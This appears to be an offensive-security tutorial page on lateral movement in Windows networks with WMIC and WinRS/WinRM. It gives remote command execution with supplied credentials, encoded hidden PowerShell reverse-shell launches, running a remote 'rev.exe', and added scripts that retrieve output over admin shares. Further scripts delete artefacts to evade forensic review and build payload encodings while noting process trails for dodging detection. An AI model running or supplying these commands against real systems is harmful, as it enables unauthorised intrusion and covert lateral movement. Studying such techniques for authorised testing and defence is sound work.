
💥 WMI & WinRM


WMIC

🧠 What’s the Deal?

WMIC (Windows Management Instrumentation Command-line) is the built-in command-line front end to WMI. Because it ships with Windows and can talk to remote hosts over RPC/DCOM, administrators use it for fleet management and attackers use it for lateral movement without dropping extra tooling (living off the land).

The pattern below uses WMIC's Win32_Process.Create method to start a process on another machine in the network under the supplied credentials.


🧰 Gear Up (Prereqs)

The attack only works when all of the following hold:

  • Credentials of a domain (or local) user that is a member of the target's local Administrators group; WMI remote access is admin-only by default.
  • Network connectivity to the target on TCP 135 (RPC endpoint mapper) plus the dynamic RPC port the DCOM server hands back (49152-65535 by default). TCP 445 (SMB) is only needed if you also stage a binary or pull output back over an admin share.
  • Remote WMI/DCOM access allowed by the host firewall (the "Windows Management Instrumentation (WMI)" rule group, usually open in AD environments).
  • wmic.exe available on the machine you operate from: it is deprecated and, from Windows 11 24H2 onwards, no longer installed by default, so on a modern jump host either copy it over or use the PowerShell CIM cmdlets, which drive the same WMI methods.

Quick checks before Exploitation

Before diving into exploitation, confirm that you can actually execute commands on the target. The checks below also tell you which of the two channels (WMI over DCOM, or WinRM) is open, so you know which of the two tools to reach for.

Checking WMI

wmic /node:TARGET_IP /user:DOMAIN\User /password:Pass123 os get caption

OR PowerShell Command

Get-WmiObject -Class Win32_OperatingSystem -ComputerName TARGET -Credential DOMAIN\User
(-Credential prompts for the password. Get-WmiObject exists only in Windows PowerShell 5.1; on PowerShell 7 use Get-CimInstance over a DCOM CimSession instead.)

Checking WINRM

winrs -r:TARGET_IP -u:DOMAIN\User -p:Pass123 ipconfig

OR PowerShell command

Enter-PSSession -ComputerName TARGET -Credential DOMAIN\User
(Success drops you into an interactive prompt on TARGET; type exit to leave the session.)
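The two checks above, combined into one pre-flight script that reports which channel (WMI/DCOM or WinRM) you can use. This is an added example, not code from the original page; TARGET_IP and DOMAIN\User are placeholders and the password is prompted for.

```powershell
# Added example (not from the original page). Placeholders assumed: TARGET_IP, DOMAIN\User.
$Target = 'TARGET_IP'
$cred   = Get-Credential -UserName 'DOMAIN\User' -Message 'Target credentials'

# 1. Port reachability: 135 (RPC endpoint mapper, WMI/DCOM), 445 (SMB, only for
#    staging files), 5985/5986 (WinRM HTTP/HTTPS).
$ports = 135, 445, 5985, 5986
$reach = foreach ($p in $ports) {
    $r = Test-NetConnection -ComputerName $Target -Port $p -WarningAction SilentlyContinue
    [pscustomobject]@{ Port = $p; Open = $r.TcpTestSucceeded }
}
$reach | Format-Table -AutoSize

# 2. WMI over DCOM: a CimSession with the DCOM protocol is the same channel
#    wmic uses. A cheap Win32_OperatingSystem query proves the namespace is
#    reachable with these credentials.
try {
    $opt = New-CimSessionOption -Protocol Dcom
    $wmi = New-CimSession -ComputerName $Target -Credential $cred -SessionOption $opt -ErrorAction Stop
    $os  = Get-CimInstance -CimSession $wmi -ClassName Win32_OperatingSystem
    "WMI OK: $($os.Caption) $($os.Version)"
    Remove-CimSession $wmi
} catch {
    "WMI failed: $($_.Exception.Message)"
}

# 3. WinRM: Test-WSMan proves the listener answers and accepts the credentials;
#    Invoke-Command proves we can actually run code in that session.
try {
    $null = Test-WSMan -ComputerName $Target -Credential $cred -Authentication Negotiate -ErrorAction Stop
    $who  = Invoke-Command -ComputerName $Target -Credential $cred -ScriptBlock { whoami } -ErrorAction Stop
    "WinRM OK: remote session runs as $who"
} catch {
    "WinRM failed: $($_.Exception.Message)"
}
```

If WMI succeeds but WinRM fails with a TrustedHosts error, you connected by IP address over HTTP: either add the target to the WinRM client's TrustedHosts, connect by hostname so Kerberos is used, or use the HTTPS listener on 5986.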

🚀 Launch Sequence (How-To)

Use the commands below to create a new process on the target and run commands through it.

Using the wmic tool

  1. To execute commands
wmic /node:TARGET_IP /user:DOMAIN\user /password:Pass123 process call create "cmd.exe /c whoami"
  • /node: → target system
  • /user: and /password: → credentials
  • process call create → calls Win32_Process.Create, which starts the process on the target
  • The call returns only a ProcessId and a ReturnValue (0 = success, 2 = access denied, 9 = path not found), not the command's output: whoami runs on the target, but its text is never sent back. Redirect output to a file and fetch that, or use a payload that connects back to you.
  2. To get a reverse shell using PowerShell
wmic /node:TARGET process call create "powershell -enc <base64_payload>"
  • -enc expects Base64 of the UTF-16LE bytes of the script; Base64 of UTF-8 text is silently rejected.
  3. To execute a binary already on the remote machine
wmic /node:TARGET_IP process call create "C:\Users\Public\rev.exe"
  • When /user: and /password: are omitted, wmic authenticates with the current logon token, so run it from a session that already holds the domain credentials (for example one started with runas /netonly).
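Because Win32_Process.Create never returns the new process's output, the usual workaround is to redirect it into a file on the target and read that file back over the C$ admin share. The script below does exactly that with the PowerShell CIM cmdlets (the same WMI method wmic calls). It is an added example, not code from the original page; TARGET_IP, DOMAIN\User and the drop path C:\Windows\Temp\wmi_out.txt are assumed placeholders.

```powershell
# Added example (not from the original page). Placeholders assumed:
# TARGET_IP, DOMAIN\User, and C:\Windows\Temp\wmi_out.txt as the drop file.
$Target  = 'TARGET_IP'
$cred    = Get-Credential -UserName 'DOMAIN\User' -Message 'Target credentials'
$outFile = 'C:\Windows\Temp\wmi_out.txt'

# Same channel wmic uses: WMI over DCOM (TCP 135 plus a dynamic port).
$opt = New-CimSessionOption -Protocol Dcom
$s   = New-CimSession -ComputerName $Target -Credential $cred -SessionOption $opt

# Win32_Process.Create hands back only ProcessId and ReturnValue; stdout of the
# new process is lost. Wrap the command in cmd.exe and redirect into a file.
$cmd = "cmd.exe /c whoami /all > `"$outFile`" 2>&1"
$r = Invoke-CimMethod -CimSession $s -ClassName Win32_Process -MethodName Create `
        -Arguments @{ CommandLine = $cmd }

# ReturnValue: 0 = success, 2 = access denied, 9 = path not found, 21 = invalid parameter
if ($r.ReturnValue -ne 0) {
    throw "Win32_Process.Create failed, ReturnValue=$($r.ReturnValue)"
}
"Started PID $($r.ProcessId) on $Target"

# Poll until that PID disappears, i.e. cmd.exe has finished writing the file.
while (Get-CimInstance -CimSession $s -ClassName Win32_Process -Filter "ProcessId = $($r.ProcessId)") {
    Start-Sleep -Milliseconds 500
}

# Pull the output back over the C$ admin share; this is the step that needs TCP 445.
# Mapping a PSDrive with the credential establishes the SMB session for the UNC path.
$uncPath = "\\$Target\C$\" + $outFile.Substring(3)      # drop the leading 'C:\'
New-PSDrive -Name WmiOut -PSProvider FileSystem -Root "\\$Target\C$" -Credential $cred | Out-Null
Get-Content $uncPath
Remove-Item $uncPath -Force        # remove the artefact we left on the target
Remove-PSDrive WmiOut
Remove-CimSession $s
```

Leaving the redirect file behind is the kind of artefact a forensic review picks up, so the cleanup at the end is part of the technique, not an afterthought.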

Using winrs tool

WinRS (Windows Remote Shell) works like WMIC, but instead of WMI/DCOM it uses WinRM (Windows Remote Management), which carries WS-Management SOAP over HTTP (TCP 5985) or HTTPS (TCP 5986). Unlike Win32_Process.Create, it streams the command's stdout and stderr back to you.

PreReq

  • Valid credentials (domain or local user).
  • WinRM enabled and listening on the target (on by default on Windows Server 2012 and later, off by default on workstations).
  • The user must be a member of the target's local Administrators group or of the "Remote Management Users" group.
  • When you connect by IP address over HTTP, authentication falls back to NTLM and the WinRM client only proceeds if the target is in its TrustedHosts list; connect by hostname (Kerberos) or over HTTPS to avoid that.

Commands

  1. Executing commands
winrs -r:TARGET_IP -u:DOMAIN\user -p:Password123 "ipconfig /all"
  • -r: → target host (IP or hostname).
  • -u: and -p: → credentials.
  • The quoted part is the command executed remotely; its output is returned to your console.
  2. Executing a binary already on the target (for example a reverse shell)
winrs -r:TARGET_IP "C:\Users\Public\rev.exe"
  • Without -u: and -p:, winrs uses your current logon token, so the calling session must already hold valid domain credentials.
  3. Running PowerShell commands (for a reverse shell)
winrs -r:TARGET_IP -u:DOMAIN\user -p:Password123 "powershell -nop -w hidden -e <base_64_enc_PS_Command>"
  • As with wmic, -e expects Base64 of the UTF-16LE bytes of the script, not of UTF-8 text.
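Both the wmic and the winrs reverse-shell lines above depend on building the -e / -enc argument correctly, which is the step that most often goes wrong. The script below shows how to produce that argument and then dispatches it over WinRM two ways: through winrs exactly as on the page, and through native PowerShell remoting, which needs no encoding at all. It is an added example, not code from the original page; TARGET_IP and DOMAIN\User are placeholders, and the payload is a benign stand-in for the reverse-shell stage.

```powershell
# Added example (not from the original page). Placeholders assumed: TARGET_IP, DOMAIN\User.
$Target = 'TARGET_IP'
$cred   = Get-Credential -UserName 'DOMAIN\User' -Message 'Target credentials'

# -EncodedCommand / -e expects Base64 of the UTF-16LE ("Unicode") bytes of the
# script. Encoding UTF-8 or ASCII bytes yields an argument powershell.exe
# silently rejects, which is the usual reason a "-e <payload>" stage never fires.
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Script)
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
}

# Benign stand-in for the reverse-shell stage the page refers to.
$payload = 'whoami; hostname; "PS $($PSVersionTable.PSVersion)"'
$enc     = ConvertTo-EncodedCommand $payload

# A. winrs, as on the page, with a correctly built -e argument.
#    Connecting by IP over HTTP (5985) means NTLM, and the client refuses unless
#    the target is in TrustedHosts. Adding it requires admin rights on *your*
#    machine; the alternatives are the hostname (Kerberos) or -usessl against 5986.
$trusted = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
if ($trusted -ne '*' -and $trusted -notmatch [regex]::Escape($Target)) {
    Set-Item WSMan:\localhost\Client\TrustedHosts -Value $Target -Concatenate -Force
}
$pw = $cred.GetNetworkCredential().Password
winrs "-r:$Target" "-u:$($cred.UserName)" "-p:$pw" "powershell -nop -w hidden -e $enc"

# B. Native PowerShell remoting over the same WinRM listener. The script block is
#    shipped as-is and the results come back as objects, so no -e encoding is
#    needed. Add -UseSSL -Port 5986 to use the TLS listener instead.
Invoke-Command -ComputerName $Target -Credential $cred `
    -ScriptBlock ([scriptblock]::Create($payload))
```

Option B also leaves a different trail on the target: winrs spawns cmd.exe under the WinRM host process, whereas Invoke-Command runs inside wsmprovhost.exe directly, which matters if you are trying to stay under specific process-creation detections.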